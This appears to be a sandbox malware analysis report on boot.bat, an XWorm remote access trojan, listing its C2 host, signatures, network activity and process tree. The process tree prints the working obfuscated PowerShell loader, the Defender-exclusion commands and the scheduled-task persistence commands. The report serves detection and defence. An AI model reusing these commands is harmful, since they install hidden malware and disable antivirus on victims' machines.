Overview

overview

10

Static

static

1

boot.bat

windows10-1703-x64

10

boot.bat

windows10-2004-x64

10

boot.bat

windows11-21h2-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240704-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/07/2024, 07:02 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    boot.bat

  • Size

    410KB

  • MD5

    d87efb4cf8da07e1956944f23313bb5b

  • SHA1

    929203873eaf41e02377a26e1ef4db8a88d37696

  • SHA256

    f3d0b86b5b93ff36ccb01f326eae7b612a3016c6d570478de2211d01d2e39cbd

  • SHA512

    d726064d2833f4ee4a52dc85515f6dd471e72acd53d2576916313a0aaa224e199ba56cdf6fbd5fe4b21be62ab38779adc1b977b333971f160ac8cf3e26ba952a

  • SSDEEP

    12288:xpWbCqT4gUVKkPSmSZ+XPk6V4mzYWQvKMbGt:xkGqTjURpXPkAUvvKMit

Score
10/10
xwormexecutionpersistencerattrojan

Malware Config

Extracted

Family

xworm

C2

case-shield.gl.at.ply.gg:26501

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    system.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies data under HKEY_USERS 41 IoCs
  • Modifies registry class 15 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k DcomLaunch -p
    1⤵
    • Modifies registry class
    PID:796
    • C:\Windows\system32\backgroundTaskHost.exe
      "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
      2⤵
        PID:3384
      • C:\Windows\system32\wbem\wmiprvse.exe
        C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
        2⤵
          PID:4376
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k RPCSS -p
        1⤵
          PID:908
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:956
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:740
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
              1⤵
                PID:1036
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                1⤵
                  PID:1044
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                  1⤵
                    PID:1092
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                    1⤵
                      PID:1104
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                      1⤵
                        PID:1196
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                        1⤵
                        • Drops file in System32 directory
                        PID:1216
                        • C:\Users\Admin\system.exe
                          C:\Users\Admin\system.exe
                          2⤵
                          • Executes dropped EXE
                          PID:3908
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1280
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                          1⤵
                            PID:1332
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                            1⤵
                              PID:1340
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                              1⤵
                                PID:1460
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                1⤵
                                  PID:1468
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                  1⤵
                                    PID:1524
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                    1⤵
                                      PID:1532
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                      1⤵
                                        PID:1660
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                        1⤵
                                          PID:1672
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                          1⤵
                                            PID:1744
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                            1⤵
                                              PID:1780
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1828
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                1⤵
                                                  PID:1908
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1916
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                    1⤵
                                                      PID:1988
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                      1⤵
                                                        PID:1996
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
                                                        1⤵
                                                          PID:2088
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                          1⤵
                                                            PID:2100
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                            1⤵
                                                              PID:2156
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                              1⤵
                                                                PID:2280
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                1⤵
                                                                  PID:2440
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                  1⤵
                                                                    PID:2448
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                    1⤵
                                                                    • Drops file in System32 directory
                                                                    • Modifies data under HKEY_USERS
                                                                    PID:2696
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                    1⤵
                                                                      PID:2708
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                      1⤵
                                                                        PID:2752
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                        1⤵
                                                                          PID:2788
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                          1⤵
                                                                            PID:2804
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                            1⤵
                                                                              PID:3064
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                              1⤵
                                                                                PID:3320
                                                                              • C:\Windows\Explorer.EXE
                                                                                C:\Windows\Explorer.EXE
                                                                                1⤵
                                                                                  PID:3404
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\boot.bat"
                                                                                    2⤵
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:636
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vyfdhzkOhzuWPMpvreY3vZeyScn6WHRZY2R7Zkbkj4Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DAJ/xPMYanv7GkLC2SESzQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ONxiA=New-Object System.IO.MemoryStream(,$param_var); $QiWju=New-Object System.IO.MemoryStream; $Ezkrm=New-Object System.IO.Compression.GZipStream($ONxiA, [IO.Compression.CompressionMode]::Decompress); $Ezkrm.CopyTo($QiWju); $Ezkrm.Dispose(); $ONxiA.Dispose(); $QiWju.Dispose(); $QiWju.ToArray();}function execute_function($param_var,$param2_var){ $lSZJJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $YnjRv=$lSZJJ.EntryPoint; $YnjRv.Invoke($null, $param2_var);}$jEnct = 'C:\Users\Admin\AppData\Local\Temp\boot.bat';$host.UI.RawUI.WindowTitle = $jEnct;$VPrGj=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($jEnct).Split([Environment]::NewLine);foreach ($WvbhA in $VPrGj) { if ($WvbhA.StartsWith('JIMqBrjcUshFgASmplvD')) { $BgeIS=$WvbhA.Substring(20); break; }}$payloads_var=[string[]]$BgeIS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                      3⤵
                                                                                        PID:4384
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                        3⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Modifies registry class
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:4580
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_26_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_26.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                                          4⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2040
                                                                                        • C:\Windows\System32\WScript.exe
                                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_26.vbs"
                                                                                          4⤵
                                                                                          • Checks computer location settings
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:2956
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_26.bat" "
                                                                                            5⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4568
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vyfdhzkOhzuWPMpvreY3vZeyScn6WHRZY2R7Zkbkj4Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DAJ/xPMYanv7GkLC2SESzQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ONxiA=New-Object System.IO.MemoryStream(,$param_var); $QiWju=New-Object System.IO.MemoryStream; $Ezkrm=New-Object System.IO.Compression.GZipStream($ONxiA, [IO.Compression.CompressionMode]::Decompress); $Ezkrm.CopyTo($QiWju); $Ezkrm.Dispose(); $ONxiA.Dispose(); $QiWju.Dispose(); $QiWju.ToArray();}function execute_function($param_var,$param2_var){ $lSZJJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $YnjRv=$lSZJJ.EntryPoint; $YnjRv.Invoke($null, $param2_var);}$jEnct = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_26.bat';$host.UI.RawUI.WindowTitle = $jEnct;$VPrGj=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($jEnct).Split([Environment]::NewLine);foreach ($WvbhA in $VPrGj) { if ($WvbhA.StartsWith('JIMqBrjcUshFgASmplvD')) { $BgeIS=$WvbhA.Substring(20); break; }}$payloads_var=[string[]]$BgeIS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                              6⤵
                                                                                                PID:264
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                6⤵
                                                                                                • Blocklisted process makes network request
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Drops startup file
                                                                                                • Adds Run key to start application
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:2824
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                                                                                                  7⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  PID:5076
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                                                                                                  7⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  PID:1432
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\system.exe'
                                                                                                  7⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  PID:1820
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system.exe'
                                                                                                  7⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  PID:5032
                                                                                                • C:\Windows\System32\schtasks.exe
                                                                                                  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "system" /tr "C:\Users\Admin\system.exe"
                                                                                                  7⤵
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:2672
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                      1⤵
                                                                                        PID:3524
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                        1⤵
                                                                                          PID:4512
                                                                                        • C:\Windows\System32\svchost.exe
                                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                          1⤵
                                                                                            PID:536
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                            1⤵
                                                                                              PID:1764
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                              1⤵
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:692
                                                                                            • C:\Windows\System32\svchost.exe
                                                                                              C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                              1⤵
                                                                                                PID:2904

                                                                                              Network

                                                                                              • flag-us
                                                                                                DNS
                                                                                                8.8.8.8.in-addr.arpa
                                                                                                Dnscache
                                                                                                Remote address:
                                                                                                8.8.8.8:53
                                                                                                Request
                                                                                                8.8.8.8.in-addr.arpa
                                                                                                IN PTR
                                                                                                Response
                                                                                                8.8.8.8.in-addr.arpa
                                                                                                IN PTR
                                                                                                dnsgoogle
                                                                                              • flag-us
                                                                                                DNS
                                                                                                240.221.184.93.in-addr.arpa
                                                                                                Dnscache
                                                                                                Remote address:
                                                                                                8.8.8.8:53
                                                                                                Request
                                                                                                240.221.184.93.in-addr.arpa
                                                                                                IN PTR
                                                                                                Response
                                                                                              • flag-us
                                                                                                DNS
                                                                                                26.35.223.20.in-addr.arpa
                                                                                                Dnscache
                                                                                                Remote address:
                                                                                                8.8.8.8:53
                                                                                                Request
                                                                                                26.35.223.20.in-addr.arpa
                                                                                                IN PTR
                                                                                                Response
                                                                                              • flag-us
                                                                                                DNS
                                                                                                ip-api.com
                                                                                                powershell.exe
                                                                                                Remote address:
                                                                                                8.8.8.8:53
                                                                                                Request
                                                                                                ip-api.com
                                                                                                IN A
                                                                                                Response
                                                                                                ip-api.com
                                                                                                IN A
                                                                                                208.95.112.1
                                                                                              • flag-us
                                                                                                GET
                                                                                                http://ip-api.com/line/?fields=hosting
                                                                                                powershell.exe
                                                                                                Remote address:
                                                                                                208.95.112.1:80
                                                                                                Request
                                                                                                GET /line/?fields=hosting HTTP/1.1
                                                                                                Host: ip-api.com
                                                                                                Connection: Keep-Alive
                                                                                                Response
                                                                                                HTTP/1.1 200 OK
                                                                                                Date: Sat, 06 Jul 2024 07:02:34 GMT
                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                Content-Length: 6
                                                                                                Access-Control-Allow-Origin: *
                                                                                                X-Ttl: 60
                                                                                                X-Rl: 44
                                                                                              • flag-us
                                                                                                DNS
                                                                                                1.112.95.208.in-addr.arpa
                                                                                                Dnscache
                                                                                                Remote address:
                                                                                                8.8.8.8:53
                                                                                                Request
                                                                                                1.112.95.208.in-addr.arpa
                                                                                                IN PTR
                                                                                                Response
                                                                                                1.112.95.208.in-addr.arpa
                                                                                                IN PTR
                                                                                                ip-apicom
                                                                                              • flag-us
                                                                                                DNS
                                                                                                case-shield.gl.at.ply.gg
                                                                                                powershell.exe
                                                                                                Remote address:
                                                                                                8.8.8.8:53
                                                                                                Request
                                                                                                case-shield.gl.at.ply.gg
                                                                                                IN A
                                                                                                Response
                                                                                                case-shield.gl.at.ply.gg
                                                                                                IN A
                                                                                                147.185.221.17
                                                                                              • flag-us
                                                                                                DNS
                                                                                                17.221.185.147.in-addr.arpa
                                                                                                Dnscache
                                                                                                Remote address:
                                                                                                8.8.8.8:53
                                                                                                Request
                                                                                                17.221.185.147.in-addr.arpa
                                                                                                IN PTR
                                                                                                Response
                                                                                              • flag-us
                                                                                                DNS
                                                                                                103.169.127.40.in-addr.arpa
                                                                                                Dnscache
                                                                                                Remote address:
                                                                                                8.8.8.8:53
                                                                                                Request
                                                                                                103.169.127.40.in-addr.arpa
                                                                                                IN PTR
                                                                                                Response
                                                                                              • flag-us
                                                                                                DNS
                                                                                                206.23.85.13.in-addr.arpa
                                                                                                Dnscache
                                                                                                Remote address:
                                                                                                8.8.8.8:53
                                                                                                Request
                                                                                                206.23.85.13.in-addr.arpa
                                                                                                IN PTR
                                                                                                Response
                                                                                              • flag-us
                                                                                                DNS
                                                                                                192.142.123.92.in-addr.arpa
                                                                                                Dnscache
                                                                                                Remote address:
                                                                                                8.8.8.8:53
                                                                                                Request
                                                                                                192.142.123.92.in-addr.arpa
                                                                                                IN PTR
                                                                                                Response
                                                                                                192.142.123.92.in-addr.arpa
                                                                                                IN PTR
                                                                                                a92-123-142-192deploystaticakamaitechnologiescom
                                                                                              • flag-us
                                                                                                DNS
                                                                                                23.236.111.52.in-addr.arpa
                                                                                                Dnscache
                                                                                                Remote address:
                                                                                                8.8.8.8:53
                                                                                                Request
                                                                                                23.236.111.52.in-addr.arpa
                                                                                                IN PTR
                                                                                                Response
                                                                                              • flag-us
                                                                                                DNS
                                                                                                131.72.42.20.in-addr.arpa
                                                                                                Dnscache
                                                                                                Remote address:
                                                                                                8.8.8.8:53
                                                                                                Request
                                                                                                131.72.42.20.in-addr.arpa
                                                                                                IN PTR
                                                                                                Response
                                                                                              • 208.95.112.1:80
                                                                                                http://ip-api.com/line/?fields=hosting
                                                                                                http
                                                                                                powershell.exe
                                                                                                310 B
                                                                                                 347 B
                                                                                                 5
                                                                                                4

                                                                                                HTTP Request

                                                                                                GET http://ip-api.com/line/?fields=hosting

                                                                                                HTTP Response

                                                                                                200
                                                                                              • 147.185.221.17:26501
                                                                                                case-shield.gl.at.ply.gg
                                                                                                powershell.exe
                                                                                                3.1kB
                                                                                                 1.1kB
                                                                                                 31
                                                                                                21
                                                                                              • 147.185.221.17:26501
                                                                                                case-shield.gl.at.ply.gg
                                                                                                powershell.exe
                                                                                                1.6kB
                                                                                                 52 B
                                                                                                 7
                                                                                                1
                                                                                              • 8.8.8.8:53
                                                                                                8.8.8.8.in-addr.arpa
                                                                                                dns
                                                                                                Dnscache
                                                                                                66 B
                                                                                                 90 B
                                                                                                 1
                                                                                                1

                                                                                                DNS Request

                                                                                                8.8.8.8.in-addr.arpa

                                                                                              • 8.8.8.8:53
                                                                                                240.221.184.93.in-addr.arpa
                                                                                                dns
                                                                                                Dnscache
                                                                                                73 B
                                                                                                 144 B
                                                                                                 1
                                                                                                1

                                                                                                DNS Request

                                                                                                240.221.184.93.in-addr.arpa

                                                                                              • 8.8.8.8:53
                                                                                                26.35.223.20.in-addr.arpa
                                                                                                dns
                                                                                                Dnscache
                                                                                                71 B
                                                                                                 157 B
                                                                                                 1
                                                                                                1

                                                                                                DNS Request

                                                                                                26.35.223.20.in-addr.arpa

                                                                                              • 8.8.8.8:53
                                                                                                ip-api.com
                                                                                                dns
                                                                                                powershell.exe
                                                                                                56 B
                                                                                                 72 B
                                                                                                 1
                                                                                                1

                                                                                                DNS Request

                                                                                                ip-api.com

                                                                                                DNS Response

                                                                                                208.95.112.1

                                                                                              • 8.8.8.8:53
                                                                                                1.112.95.208.in-addr.arpa
                                                                                                dns
                                                                                                Dnscache
                                                                                                71 B
                                                                                                 95 B
                                                                                                 1
                                                                                                1

                                                                                                DNS Request

                                                                                                1.112.95.208.in-addr.arpa

                                                                                              • 8.8.8.8:53
                                                                                                case-shield.gl.at.ply.gg
                                                                                                dns
                                                                                                powershell.exe
                                                                                                70 B
                                                                                                 86 B
                                                                                                 1
                                                                                                1

                                                                                                DNS Request

                                                                                                case-shield.gl.at.ply.gg

                                                                                                DNS Response

                                                                                                147.185.221.17

                                                                                              • 8.8.8.8:53
                                                                                                17.221.185.147.in-addr.arpa
                                                                                                dns
                                                                                                Dnscache
                                                                                                73 B
                                                                                                 130 B
                                                                                                 1
                                                                                                1

                                                                                                DNS Request

                                                                                                17.221.185.147.in-addr.arpa

                                                                                              • 8.8.8.8:53
                                                                                                103.169.127.40.in-addr.arpa
                                                                                                dns
                                                                                                Dnscache
                                                                                                73 B
                                                                                                 147 B
                                                                                                 1
                                                                                                1

                                                                                                DNS Request

                                                                                                103.169.127.40.in-addr.arpa

                                                                                              • 8.8.8.8:53
                                                                                                206.23.85.13.in-addr.arpa
                                                                                                dns
                                                                                                Dnscache
                                                                                                71 B
                                                                                                 145 B
                                                                                                 1
                                                                                                1

                                                                                                DNS Request

                                                                                                206.23.85.13.in-addr.arpa

                                                                                              • 8.8.8.8:53
                                                                                                192.142.123.92.in-addr.arpa
                                                                                                dns
                                                                                                Dnscache
                                                                                                73 B
                                                                                                 139 B
                                                                                                 1
                                                                                                1

                                                                                                DNS Request

                                                                                                192.142.123.92.in-addr.arpa

                                                                                              • 8.8.8.8:53
                                                                                                23.236.111.52.in-addr.arpa
                                                                                                dns
                                                                                                Dnscache
                                                                                                72 B
                                                                                                 158 B
                                                                                                 1
                                                                                                1

                                                                                                DNS Request

                                                                                                23.236.111.52.in-addr.arpa

                                                                                              • 8.8.8.8:53
                                                                                                131.72.42.20.in-addr.arpa
                                                                                                dns
                                                                                                Dnscache
                                                                                                71 B
                                                                                                 157 B
                                                                                                 1
                                                                                                1

                                                                                                DNS Request

                                                                                                131.72.42.20.in-addr.arpa

                                                                                              MITRE ATT&CK Enterprise v15

                                                                                              Replay Monitor

                                                                                              Loading Replay Monitor...

                                                                                              Downloads

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                Filesize

                                                                                                3KB

                                                                                                MD5

                                                                                                661739d384d9dfd807a089721202900b

                                                                                                SHA1

                                                                                                5b2c5d6a7122b4ce849dc98e79a7713038feac55

                                                                                                SHA256

                                                                                                70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

                                                                                                SHA512

                                                                                                81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

                                                                                                Download Submit

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                Filesize

                                                                                                53KB

                                                                                                MD5

                                                                                                a26df49623eff12a70a93f649776dab7

                                                                                                SHA1

                                                                                                efb53bd0df3ac34bd119adf8788127ad57e53803

                                                                                                SHA256

                                                                                                4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

                                                                                                SHA512

                                                                                                e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

                                                                                                Download Submit

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                                                                                Filesize

                                                                                                2KB

                                                                                                MD5

                                                                                                005bc2ef5a9d890fb2297be6a36f01c2

                                                                                                SHA1

                                                                                                0c52adee1316c54b0bfdc510c0963196e7ebb430

                                                                                                SHA256

                                                                                                342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

                                                                                                SHA512

